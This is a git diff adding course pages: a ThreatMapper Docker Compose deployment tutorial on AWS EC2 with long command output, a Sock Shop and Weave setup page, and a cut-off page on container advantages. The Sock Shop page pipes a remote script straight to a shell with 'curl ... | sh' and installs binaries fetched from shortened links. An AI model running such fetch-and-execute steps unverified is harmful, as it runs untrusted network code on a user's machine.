+ThreatMapper carries on the good 'shift left' security practices that you already employ in your development pipelines. It continues to monitor running applications against emerging software vulnerabilities and monitors the host and cloud configuration against industry-expert benchmarks. + +The ThreatMapper Management Console is a container-based application that can be deployed on a single docker host or in a Kubernetes cluster. + +# What exactly is this management console useful for?
+ +* Topology-based learning of your live infrastructure + + ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720063844/e189658b-8bdf-4ede-a19f-ce04cf8b089e.png) + + +* Identify Threats and Vulnerabilities and generate SBOM (software bill of material ) + + +* ThreatGraph visualization, you can then identify the issues that present the greatest risk to the security of your applications, and prioritize these for planned protection or remediation. + + ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720087970/619f0c7e-d251-4934-b165-6157cb3f3730.png ) + + +* Manage the users who can access the console. + +* Configure Infrastructure API access and interrogate platform configurations. + +* Visualize and drill down into Kubernetes clusters, virtual machines, containers and images, running processes, and network connections in near real-time. + +* Invoke vulnerability scans on running containers and applications and review the results, ranked by the risk of exploit. + +* Invoke compliance scans on infrastructure configuration ('agentless') and on infrastructure hosts ('agent-based), - manually or automatically when they are added to a cluster. + +* Scan container registries for vulnerabilities, to review workloads before they are deployed. + +* Scan image builds during the CI/CD pipeline, supporting CircleCI, Jenkins, and GitLab. + + ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720117091/e979935e-efa6-41b6-8a9d-75c08eb78771.png) + +* Scan containers and host filesystems for unprotected secrets, including access tokens, keys and passwords. + +* Configure integrations with external notification, SIEM and ticketing systems, including Slack, PagerDuty, Jira, Splunk, ELK, Sumo Logic, and AWS S3. ThreatMapper supports multiple production deployments simultaneously so that you can visualize and scan workloads across a large production estate. + + +in a short one-stop solution for your cloud-native security issues! and it's 100% open source + +login to AWS account:- console.aws.amazon.com + +## Deploy ThreatMapper Console using Docker Compose on Linux VM using AWS EC2 + +* Create Ubuntu Instance on AWS EC2 + + ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720154113/3f081a20-b6ce-4813-8673-17d3c9abe78e.png) + + +select instance type as per requirements + +![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720172313/ad01eb1e-b960-42e2-a317-dcefc1df36d5.png ) + +Click on the launch instance + +![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720215112/24a709fc-590c-4070-9e71-01dc27bb61b4.png ) + +hurry! + +![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720236656/29ee7c7d-20b6-4a3d-a16e-4b85e169d8a8.png ) + +access AWS instance using CLI + +![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720271742/4b073e41-046e-4a25-9fba-bcbc446f397b.png ) + +![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720285296/ac528a2e-54df-4ef9-98b8-2d2d0d292c22.png ) + +```rust +sudo apt install -y apt-transport-https ca-certificates curl software-properties-common +Reading package lists... Done +Building dependency tree... Done +Reading state information... Done +ca-certificates is already the newest version (20211016). +ca-certificates set to manually installed. +software-properties-common is already the newest version (0.99.22.3). +software-properties-common set to manually installed. 
+The following additional packages will be installed: + libcurl4 +The following NEW packages will be installed: + apt-transport-https +The following packages will be upgraded: + curl libcurl4 +2 upgraded, 1 newly installed, 0 to remove and 76 not upgraded. +Need to get 485 kB of archives. +After this operation, 169 kB of additional disk space will be used. +Get:1 http://us-east-1.ec2.archive.ubuntu.com/ubuntu jammy-updates/universe amd64 apt-transport-https all 2.4.8 [1506 B] +Get:2 http://us-east-1.ec2.archive.ubuntu.com/ubuntu jammy-updates/main amd64 curl amd64 7.81.0-1ubuntu1.6 [194 kB] +Get:3 http://us-east-1.ec2.archive.ubuntu.com/ubuntu jammy-updates/main amd64 libcurl4 amd64 7.81.0-1ubuntu1.6 [290 kB] +Fetched 485 kB in 0s (11.0 MB/s) +Selecting previously unselected package apt-transport-https. +(Reading database ... 63926 files and directories currently installed.) +Preparing to unpack .../apt-transport-https_2.4.8_all.deb ... +Unpacking apt-transport-https (2.4.8) ... +Preparing to unpack .../curl_7.81.0-1ubuntu1.6_amd64.deb ... +Unpacking curl (7.81.0-1ubuntu1.6) over (7.81.0-1ubuntu1.4) ... +Preparing to unpack .../libcurl4_7.81.0-1ubuntu1.6_amd64.deb ... +Unpacking libcurl4:amd64 (7.81.0-1ubuntu1.6) over (7.81.0-1ubuntu1.4) ... +Setting up apt-transport-https (2.4.8) ... +Setting up libcurl4:amd64 (7.81.0-1ubuntu1.6) ... +Setting up curl (7.81.0-1ubuntu1.6) ... +Processing triggers for man-db (2.10.2-1) ... +Processing triggers for libc-bin (2.35-0ubuntu3.1) ... +Scanning processes... +Scanning linux images... + +Running kernel seems to be up-to-date. +``` + +# Install docker + +```rust +curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - +sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu focal stable" +apt-cache policy docker-ce +sudo apt install -y docker-ce +Warning: apt-key is deprecated. Manage keyring files in trusted.gpg.d instead (see apt-key(8)). +OK +Repository: 'deb [arch=amd64] https://download.docker.com/linux/ubuntu focal stable' +Description: +Archive for codename: focal components: stable +More info: https://download.docker.com/linux/ubuntu +Adding repository. +Press [ENTER] to continue or Ctrl-c to cancel. +Found existing deb entry in /etc/apt/sources.list.d/archive_uri-https_download_docker_com_linux_ubuntu-jammy.list +Adding deb entry to /etc/apt/sources.list.d/archive_uri-https_download_docker_com_linux_ubuntu-jammy.list +Found existing deb-src entry in /etc/apt/sources.list.d/archive_uri-https_download_docker_com_linux_ubuntu-jammy.list +Adding disabled deb-src entry to /etc/apt/sources.list.d/archive_uri-https_download_docker_com_linux_ubuntu-jammy.list +Hit:1 http://us-east-1.ec2.archive.ubuntu.com/ubuntu jammy InRelease +Hit:2 http://us-east-1.ec2.archive.ubuntu.com/ubuntu jammy-updates InRelease +Hit:3 http://us-east-1.ec2.archive.ubuntu.com/ubuntu jammy-backports InRelease +Hit:4 https://download.docker.com/linux/ubuntu focal InRelease +Hit:5 http://security.ubuntu.com/ubuntu jammy-security InRelease +Reading package lists... Done +W: https://download.docker.com/linux/ubuntu/dists/focal/InRelease: Key is stored in legacy trusted.gpg keyring (/etc/apt/trusted.gpg), see the DEPRECATION section in apt-key(8) for details. 
+docker-ce: + Installed: 5:20.10.21~3-0~ubuntu-focal + Candidate: 5:20.10.21~3-0~ubuntu-focal + Version table: + *** 5:20.10.21~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 100 /var/lib/dpkg/status + 5:20.10.20~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.19~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.18~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.17~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.16~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.15~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.14~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.13~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.12~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.11~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.10~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.9~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.8~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.7~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.6~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.5~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.4~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.3~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.2~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.1~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:20.10.0~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:19.03.15~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:19.03.14~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:19.03.13~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:19.03.12~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:19.03.11~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:19.03.10~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages + 5:19.03.9~3-0~ubuntu-focal 500 + 500 https://download.docker.com/linux/ubuntu focal/stable amd64 Packages +Reading package lists... Done +Building dependency tree... Done +Reading state information... 
Done +``` + +# verify whether docker is installed or not + +```rust +docker + +Usage: docker [OPTIONS] COMMAND + +A self-sufficient runtime for containers + +Options: + --config string Location of client config files (default "/home/ubuntu/.docker") + -c, --context string Name of the context to use to connect to the daemon (overrides DOCKER_HOST env var and default context set + with "docker context use") + -D, --debug Enable debug mode + -H, --host list Daemon socket(s) to connect to + -l, --log-level string Set the logging level ("debug"|"info"|"warn"|"error"|"fatal") (default "info") + --tls Use TLS; implied by --tlsverify + --tlscacert string Trust certs signed only by this CA (default "/home/ubuntu/.docker/ca.pem") + --tlscert string Path to TLS certificate file (default "/home/ubuntu/.docker/cert.pem") + --tlskey string Path to TLS key file (default "/home/ubuntu/.docker/key.pem") + --tlsverify Use TLS and verify the remote + -v, --version Print version information and quit + +Management Commands: + app* Docker App (Docker Inc., v0.9.1-beta3) + builder Manage builds + buildx* Docker Buildx (Docker Inc., v0.9.1-docker) + config Manage Docker configs + container Manage containers + context Manage contexts + image Manage images + manifest Manage Docker image manifests and manifest lists + network Manage networks + node Manage Swarm nodes + plugin Manage plugins + scan* Docker Scan (Docker Inc., v0.21.0) + secret Manage Docker secrets + service Manage services + stack Manage Docker stacks + swarm Manage Swarm + system Manage Docker + trust Manage trust on Docker images + volume Manage volumes + +Commands: + attach Attach local standard input, output, and error streams to a running container + build Build an image from a Dockerfile + commit Create a new image from a container's changes + cp Copy files/folders between a container and the local filesystem + create Create a new container + diff Inspect changes to files or directories on a container's filesystem + events Get real time events from the server + exec Run a command in a running container + export Export a container's filesystem as a tar archive + history Show the history of an image + images List images + import Import the contents from a tarball to create a filesystem image + info Display system-wide information + inspect Return low-level information on Docker objects + kill Kill one or more running containers + load Load an image from a tar archive or STDIN + login Log in to a Docker registry + logout Log out from a Docker registry + logs Fetch the logs of a container + pause Pause all processes within one or more containers + port List port mappings or a specific mapping for the container + ps List containers + pull Pull an image or a repository from a registry + push Push an image or a repository to a registry + rename Rename a container + restart Restart one or more containers + rm Remove one or more containers + rmi Remove one or more images + run Run a command in a new container + save Save one or more images to a tar archive (streamed to STDOUT by default) + search Search the Docker Hub for images + start Start one or more stopped containers + stats Display a live stream of container(s) resource usage statistics + stop Stop one or more running containers + tag Create a tag TARGET_IMAGE that refers to SOURCE_IMAGE + top Display the running processes of a container + unpause Unpause all processes within one or more containers + update Update configuration of one or more containers + version Show the Docker version 
information + wait Block until one or more containers stop, then print their exit codes + +Run 'docker COMMAND --help' for more information on a command. +``` + +# install docker-compose + +```rust +sudo sysctl -w vm.max_map_count=262144 +sudo curl -L https://github.com/docker/compose/releases/latest/download/docker-compose-linux-x86_64 -o /usr/local/bin/docker-compose +sudo mv /usr/local/bin/docker-compose /usr/bin/docker-compose +sudo chmod +x /usr/bin/docker-compose +docker-compose --version +vm.max_map_count = 262144 +``` + +# docker-compose up + +```rust + sudo docker-compose -f docker-compose.yml up --detach +``` + +# pulling all docker images required for the management console + +```rust +[+] Running 132/133al-router Pulled 5.1s + β § deepfence-ui Pulling 55.8s + β Ώ ee30d1e46960 Pull complete 18.1s + β Ώ cbdf55152882 Pull complete 20.7s + β Ώ 02145a3d08dc Pull complete 24.4s + β Ώ 3b43024e0402 Pull complete 25.5s + β Ώ 000a421a9381 Pull complete 25.8s + β Ώ 273e2d14a316 Pull complete 26.1s + β Ώ 35f2174af386 Pull complete 52.7s + β Ώ 3bf6d37d02af Pull complete 53.2s + β Ώ 2ebf2edf21e9 Pull complete 53.7s + β Ώ 70ecf58c4679 Pull complete 54.1s + β Ώ deepfence-package-scanner Pulled 8.8s + β Ώ 51dd59142225 Pull complete 4.0s + β Ώ afd427f95343 Pull complete 5.2s + β Ώ ad4b784c8601 Pull complete 7.5s + β Ώ deepfence-backend Pulled 48.2s + β Ώ deepfence-console-agent Pulled 46.4s + β Ώ e0c9ebf1f052 Pull complete 25.5s + β Ώ 9341ad80650d Pull complete 26.0s + β Ώ b6a94e577185 Pull complete 26.9s + β Ώ f2f4f6c497c7 Pull complete 27.4s + β Ώ 83dc6dff4d1f Pull complete 27.8s + β Ώ 2c66b377cc17 Pull complete 28.1s + β Ώ ae95bb3e76fc Pull complete 29.9s + β Ώ 58edf371ef84 Pull complete 30.5s + β Ώ b5b91601778a Pull complete 30.9s + β Ώ e7ca0b813b35 Pull complete 31.4s + β Ώ bac5f99ed5ff Pull complete 32.2s + β Ώ 0b03b6c6e703 Pull complete 32.7s + β Ώ 00ef62c6beae Pull complete 33.1s + β Ώ 2317941b432c Pull complete 33.4s + β Ώ c78d4ef87429 Pull complete 33.8s + β Ώ 52d6b999791e Pull complete 37.0s + β Ώ 3c66ae264813 Pull complete 40.4s + β Ώ fa91d8140bb4 Pull complete 44.0s + β Ώ 415ec3af8b5c Pull complete 45.0s + β Ώ deepfence-diagnosis Pulled 9.3s + β Ώ d8089fb41a4e Pull complete 7.2s + β Ώ 761247dc597b Pull complete 7.9s + β Ώ deepfence-vulnerability-mapper Pulled 9.0s + β Ώ 9621f1afde84 Pull complete 4.8s + β Ώ d2f87f45af97 Pull complete 5.8s + β Ώ 0df38fc1dcc4 Pull complete 5.8s + β Ώ 5ce3bac9b38d Pull complete 6.0s + β Ώ b8a17e0751b8 Pull complete 7.7s + β Ώ deepfence-redis Pulled 20.4s + β Ώ 192e03523482 Pull complete 14.1s + β Ώ 7151bccd2756 Pull complete 14.9s + β Ώ e599fac432b2 Pull complete 16.0s + β Ώ 720d86c10923 Pull complete 16.5s + β Ώ 40911e48517b Pull complete 16.9s + β Ώ 115eb662e680 Pull complete 17.3s + β Ώ 31b9b283aa20 Pull complete 17.9s + β Ώ b748b52207f7 Pull complete 18.3s + β Ώ 5b0f449535b8 Pull complete 18.9s + β Ώ deepfence-api Pulled 48.3s + β Ώ 31b3f1ad4ce1 Pull complete 1.8s + β Ώ f335cc1597f2 Pull complete 2.0s + β Ώ 0375df124bb5 Pull complete 2.6s + β Ώ 90a356bcda5b Pull complete 2.7s + β Ώ c82e0170c13b Pull complete 2.9s + β Ώ 38dc58c5f029 Pull complete 3.0s + β Ώ 0189a7ca7a09 Pull complete 40.8s + β Ώ 8d069dc99fe4 Pull complete 45.2s + β Ώ 50e62824984f Pull complete 45.6s + β Ώ c12613b81b5c Pull complete 45.8s + β Ώ c8901960f9b5 Pull complete 45.9s + β Ώ a5981c5eb3db Pull complete 46.3s + β Ώ 860d4f2e0b1a Pull complete 46.8s + β Ώ 8a3f7b35b548 Pull complete 47.0s + β Ώ 37c02a7c1188 Pull complete 47.4s + β Ώ deepfence-celery Pulled 48.2s + β Ώ 
deepfence-postgres Pulled 28.2s + β Ώ 7902437d3a12 Pull complete 10.9s + β Ώ 709e2267bc98 Pull complete 11.5s + β Ώ 10c5a0a9c34e Pull complete 21.4s + β Ώ b46af7f38693 Pull complete 22.4s + β Ώ 65aa0c237f80 Pull complete 23.3s + β Ώ f6493ce74812 Pull complete 24.0s + β Ώ eaac3b44f9d0 Pull complete 24.5s + β Ώ 3b6db84bcdcc Pull complete 25.1s + β Ώ 120ba5542ffd Pull complete 25.5s + β Ώ 9fd0e93acee4 Pull complete 25.8s + β Ώ 257465d6d91b Pull complete 26.1s + β Ώ 568fad078a9c Pull complete 26.5s + β Ώ deepfence-init-container Pulled 14.8s + β Ώ 2ad0d7925a78 Pull complete 12.6s + β Ώ 3e00d8e06113 Pull complete 13.2s + β Ώ deepfence-es Pulled 41.1s + β Ώ 4e9f2cdf4387 Pull complete 15.3s + β Ώ 2e70516637d4 Pull complete 37.1s + β Ώ ba468cc9ce22 Pull complete 37.6s + β Ώ a2c864bf08ba Pull complete 38.1s + β Ώ 7869dc55514f Pull complete 38.8s + β Ώ 6320c0eaee7c Pull complete 39.5s +[+] Running 133/133al-router Pulled 5.1s + β Ώ deepfence-ui Pulled 55.9s + β Ώ ee30d1e46960 Pull complete 18.1s + β Ώ cbdf55152882 Pull complete 20.7s + β Ώ 02145a3d08dc Pull complete 24.4s + β Ώ 3b43024e0402 Pull complete 25.5s + β Ώ 000a421a9381 Pull complete 25.8s + β Ώ 273e2d14a316 Pull complete 26.1s + β Ώ 35f2174af386 Pull complete 52.7s + β Ώ 3bf6d37d02af Pull complete 53.2s + β Ώ 2ebf2edf21e9 Pull complete 53.7s + β Ώ 70ecf58c4679 Pull complete 54.1s + β Ώ deepfence-package-scanner Pulled 8.8s + β Ώ 51dd59142225 Pull complete 4.0s + β Ώ afd427f95343 Pull complete 5.2s + β Ώ ad4b784c8601 Pull complete 7.5s + β Ώ deepfence-backend Pulled 48.2s + β Ώ deepfence-console-agent Pulled 46.4s + β Ώ e0c9ebf1f052 Pull complete 25.5s + β Ώ 9341ad80650d Pull complete 26.0s + β Ώ b6a94e577185 Pull complete 26.9s + β Ώ f2f4f6c497c7 Pull complete 27.4s + β Ώ 83dc6dff4d1f Pull complete 27.8s + β Ώ 2c66b377cc17 Pull complete 28.1s + β Ώ ae95bb3e76fc Pull complete 29.9s + β Ώ 58edf371ef84 Pull complete 30.5s + β Ώ b5b91601778a Pull complete 30.9s + β Ώ e7ca0b813b35 Pull complete 31.4s + β Ώ bac5f99ed5ff Pull complete 32.2s + β Ώ 0b03b6c6e703 Pull complete 32.7s + β Ώ 00ef62c6beae Pull complete 33.1s + β Ώ 2317941b432c Pull complete 33.4s + β Ώ c78d4ef87429 Pull complete 33.8s + β Ώ 52d6b999791e Pull complete 37.0s + β Ώ 3c66ae264813 Pull complete 40.4s + β Ώ fa91d8140bb4 Pull complete 44.0s + β Ώ 415ec3af8b5c Pull complete 45.0s + β Ώ deepfence-diagnosis Pulled 9.3s + β Ώ d8089fb41a4e Pull complete 7.2s + β Ώ 761247dc597b Pull complete 7.9s + β Ώ deepfence-vulnerability-mapper Pulled 9.0s + β Ώ 9621f1afde84 Pull complete 4.8s + β Ώ d2f87f45af97 Pull complete 5.8s + β Ώ 0df38fc1dcc4 Pull complete 5.8s + β Ώ 5ce3bac9b38d Pull complete 6.0s + β Ώ b8a17e0751b8 Pull complete 7.7s + β Ώ deepfence-redis Pulled 20.4s + β Ώ 192e03523482 Pull complete 14.1s + β Ώ 7151bccd2756 Pull complete 14.9s + β Ώ e599fac432b2 Pull complete 16.0s + β Ώ 720d86c10923 Pull complete 16.5s + β Ώ 40911e48517b Pull complete 16.9s + β Ώ 115eb662e680 Pull complete 17.3s + β Ώ 31b9b283aa20 Pull complete 17.9s + β Ώ b748b52207f7 Pull complete 18.3s + β Ώ 5b0f449535b8 Pull complete 18.9s + β Ώ deepfence-api Pulled 48.3s + β Ώ 31b3f1ad4ce1 Pull complete 1.8s + β Ώ f335cc1597f2 Pull complete 2.0s + β Ώ 0375df124bb5 Pull complete 2.6s + β Ώ 90a356bcda5b Pull complete 2.7s + β Ώ c82e0170c13b Pull complete 2.9s + β Ώ 38dc58c5f029 Pull complete 3.0s + β Ώ 0189a7ca7a09 Pull complete 40.8s + β Ώ 8d069dc99fe4 Pull complete 45.2s + β Ώ 50e62824984f Pull complete 45.6s + β Ώ c12613b81b5c Pull complete 45.8s + β Ώ c8901960f9b5 Pull complete 45.9s + β Ώ a5981c5eb3db Pull 
complete 46.3s + β Ώ 860d4f2e0b1a Pull complete 46.8s + β Ώ 8a3f7b35b548 Pull complete 47.0s + β Ώ 37c02a7c1188 Pull complete 47.4s + β Ώ deepfence-celery Pulled 48.2s + β Ώ deepfence-postgres Pulled 28.2s + β Ώ 7902437d3a12 Pull complete 10.9s + β Ώ 709e2267bc98 Pull complete 11.5s + β Ώ 10c5a0a9c34e Pull complete 21.4s + β Ώ b46af7f38693 Pull complete 22.4s + β Ώ 65aa0c237f80 Pull complete 23.3s + β Ώ f6493ce74812 Pull complete 24.0s + β Ώ eaac3b44f9d0 Pull complete 24.5s + β Ώ 3b6db84bcdcc Pull complete 25.1s + β Ώ 120ba5542ffd Pull complete 25.5s + β Ώ 9fd0e93acee4 Pull complete 25.8s + β Ώ 257465d6d91b Pull complete 26.1s + β Ώ 568fad078a9c Pull complete 26.5s + β Ώ deepfence-init-container Pulled 14.8s + β Ώ 2ad0d7925a78 Pull complete 12.6s + β Ώ 3e00d8e06113 Pull complete 13.2s + β Ώ deepfence-es Pulled 41.1s + β Ώ 4e9f2cdf4387 Pull complete 15.3s + β Ώ 2e70516637d4 Pull complete 37.1s + β Ώ ba468cc9ce22 Pull complete 37.6s + β Ώ a2c864bf08ba Pull complete 38.1s + β Ώ 7869dc55514f Pull complete 38.8s + β Ώ 6320c0eaee7c Pull complete 39.5s + β Ώ deepfence-internal-router Pulled 5.1s + β Ώ deepfence-secret-scanner Pulled 43.2s + β Ώ c963e9db8328 Pull complete 34.6s + β Ώ 7f20bc208900 Pull complete 35.0s + β Ώ a11f9e68c7c1 Pull complete 36.3s + β Ώ bac7f7e29d55 Pull complete 36.5s + β Ώ a34450f81e53 Pull complete 37.2s + β Ώ 8dc83348f20e Pull complete 41.0s + β Ώ 1789eac203f6 Pull complete 41.6s + β Ώ deepfence-fetcher Pulled 44.4s + β Ώ 59bf1c3509f3 Pull complete 22.1s + β Ώ 7f019d2ddd3b Pull complete 23.2s + β Ώ d365c5dd6d5a Pull complete 23.7s + β Ώ 86b2e2904ff3 Pull complete 24.2s + β Ώ 9e8d01c5b686 Pull complete 42.5s + β Ώ deepfence-router Pulled 5.1s + β Ώ df9b9388f04a Pull complete 1.8s + β Ώ 7c1ae225ee09 Pull complete 1.9s + β Ώ d67475b58d2b Pull complete 2.5s + β Ώ 403f08e781eb Pull complete 2.6s + β Ώ 452f212a53d1 Pull complete 2.8s + β Ώ 437cebde658b Pull complete 2.8s + β Ώ 7c9ad45672b2 Pull complete 2.9s + β Ώ 7d72372a1383 Pull complete 3.1s + β Ώ d6bb5a9a1f12 Pull complete 3.2s + β Ώ 7cf149b1a854 Pull complete 3.3s + β Ώ b6e2429d9e38 Pull complete 3.3s + β Ώ 92dcd490ec00 Pull complete 3.4s + β Ώ 617b7a99eac3 Pull complete 3.5s + β Ώ 259e00ee3450 Pull complete 3.6s + β Ώ 83bec234123b Pull complete 3.7s + β Ώ 928a4d3b5efe Pull complete 3.8s + β Ώ deepfence-topology Pulled 34.0s + β Ώ a0d0a0d46f8b Pull complete 16.0s + β Ώ 127cfa2b873d Pull complete 16.6s + β Ώ 15a88de45267 Pull complete 30.3s + β Ώ 35233bb75987 Pull complete 32.0s + β Ώ 8133cfb2a953 Pull complete 32.4s +[+] Running 19/19 + β Ώ Network ubuntu_deepfence_net Created 0.3s + β Ώ Volume "ubuntu_deepfence_data" Created 0.0s + β Ώ Container deepfence-postgres Started 16.5s + β Ώ Container deepfence-secret-scanner Started 18.4s + β Ώ Container deepfence-vulnerability-mapper Started 17.3s + β Ώ Container deepfence-diagnosis Started 17.5s + β Ώ Container deepfence-package-scanner Started 17.7s + β Ώ Container deepfence-console-agent Started 16.0s + β Ώ Container deepfence-es-master Started 17.1s + β Ώ Container df-init-container Started 16.0s + β Ώ Container deepfence-topology Started 17.3s + β Ώ Container deepfence-router Started 18.4s + β Ώ Container deepfence-internal-router Started 17.5s + β Ώ Container deepfence-redis Started 2.3s + β Ώ Container deepfence-ui Started 2.8s + β Ώ Container deepfence-fetcher Started 2.4s + β Ώ Container deepfence-celery Started 3.5s + β Ώ Container deepfence-api Started 3.4s + β Ώ Container deepfence-backend Started 3.1s +``` + +## check all running docker containers + +```rust + 
+docker ps +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +4514ee6713ac deepfenceio/deepfence_api_ce:1.4.1 "/app/code/dockerify…" About a minute ago Up About a minute deepfence-api +1ba3ffed69da deepfenceio/deepfence_api_ce:1.4.1 "/app/code/dockerify…" About a minute ago Up About a minute deepfence-backend +8bab0ec9f33c deepfenceio/deepfence_api_ce:1.4.1 "/app/code/dockerify…" About a minute ago Up About a minute deepfence-celery +22656ac2f42e deepfenceio/deepfence_fetcher_ce:1.4.1 "/usr/bin/start_fetc…" About a minute ago Up About a minute 8006/tcp deepfence-fetcher +53e90c2fb2ee deepfenceio/deepfence_ui_ce:1.4.1 "/home/deepfence/ent…" About a minute ago Up About a minute deepfence-ui +ef95a5d836af deepfenceio/deepfence_redis_ce:1.4.1 "/usr/local/bin/star…" About a minute ago Up About a minute 6379/tcp deepfence-redis +41861a1a902d deepfenceio/deepfence_elastic_ce:1.4.1 "/usr/bin/startEs.sh…" About a minute ago Up About a minute 127.0.0.1:9200->9200/tcp, 127.0.0.1:9300->9300/tcp deepfence-es-master +d7f746d048f1 deepfenceio/deepfence_router_ce:1.4.1 "docker-entrypoint.s…" About a minute ago Up About a minute 0.0.0.0:80->80/tcp, :::80->80/tcp, 0.0.0.0:443->443/tcp, :::443->443/tcp deepfence-router +c3e6524325b1 deepfenceio/deepfence_vulnerability_mapper_ce:1.4.1 "/entrypoint.sh" About a minute ago Up About a minute 8001/tcp deepfence-vulnerability-mapper +4331c9eeb50f deepfenceio/deepfence_router_ce:1.4.1 "docker-entrypoint.s…" About a minute ago Up About a minute 127.0.0.1:8443->443/tcp deepfence-internal-router +16fae4515f45 deepfenceio/deepfence_diagnosis_ce:1.4.1 "/home/diagnosis" About a minute ago Up About a minute deepfence-diagnosis +515a139b6c8f deepfenceio/deepfence_agent_ce:1.4.1 "/usr/local/bin/star…" About a minute ago Up About a minute deepfence-console-agent +10ac5757f982 deepfenceio/deepfence_postgres_ce:1.4.1 "docker-entrypoint.s…" About a minute ago Up About a minute 5432/tcp deepfence-postgres +50621d650d96 deepfenceio/deepfence_package_scanner_ce:1.4.1 "/usr/local/bin/pack…" About a minute ago Up About a minute 8002/tcp, 8005/tcp deepfence-package-scanner +0e96086bc3d0 deepfenceio/deepfence_discovery_ce:1.4.1 "/home/deepfence/ent…" About a minute ago Up About a minute 127.0.0.1:8004->8004/tcp deepfence-topology +bda5019a336a deepfenceio/deepfence_secret_scanner_ce:1.4.1 "/home/deepfence/usr…" About a minute ago Up About a minute deepfence-secret-scanner +``` + +access threatmapper console using AWS instance public IP + +54.152.156.120 (in your case check your EC2 instance public IP ) + +![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720365441/b1c13f69-94ee-4db1-85e7-705c85adbe4a.png ) + +![](https://cdn.hashnode.com/res/hashnode/image/upload/v1671720385153/020c94de-a9bb-4d2b-a4c1-8b7101377565.png ) + +next part of this you will find here you can do the same deployment using Kubernetes or Helm \ No newline at end of file diff --git a/content/en/containersecurity/b28.Sock-shop-weave 2.md b/content/en/containersecurity/b28.Sock-shop-weave 2.md new file mode 100644 index 0000000..22cd934 --- /dev/null +++ b/content/en/containersecurity/b28.Sock-shop-weave 2.md @@ -0,0 +1,43 @@ +--- +title: "Sock Shop Docker Compose and Weave" +slug: "Sock-Shop-Docker-Compose-and-Weave" +--- + +Sock Shop Docker Compose & Weave + + +Pre-requisites +Install Docker +Install Weave Scope +Install Weave Net + +``` + +git clone https://github.com/microservices-demo/microservices-demo +cd microservices-demo +``` + + +``` +curl -sSL https://get.docker.com/ | sh +apt-get install 
-yq python-pip build-essential python-dev +pip install docker-compose +curl -L git.io/weave -o /usr/local/bin/weave +chmod a+x /usr/local/bin/weave +``` + +Launch Weave Scope + +``` + sudo curl -L git.io/scope -o /usr/local/bin/scope +sudo chmod a+x /usr/local/bin/scope +scope launch +``` + +Weave launch + +``` +weave launch +docker-compose -f deploy/docker-compose-weave/docker-compose.yml up -d + +``` \ No newline at end of file diff --git a/content/en/containersecurity/b3.Container-adv-dis 2.md b/content/en/containersecurity/b3.Container-adv-dis 2.md new file mode 100644 index 0000000..03ceecf --- /dev/null +++ b/content/en/containersecurity/b3.Container-adv-dis 2.md @@ -0,0 +1,75 @@ +--- +title: "Container Advantage and Disadvantages " +description: "The introduction to this course." +slug: "Container-Advantage-and-Disadvantages" +--- + +# Container Advantages + +Every day, developers find new ways to put containerization to work to solve their challenges. There is no shortage of ways to use containerization, and every application will likely produce unique benefits. Here are some of the most common reasons developers decide to containerize: + +- Portability + - No discussion of containerization is complete without at least one mention of the motto, β€œwrite once, run anywhere.” Since a 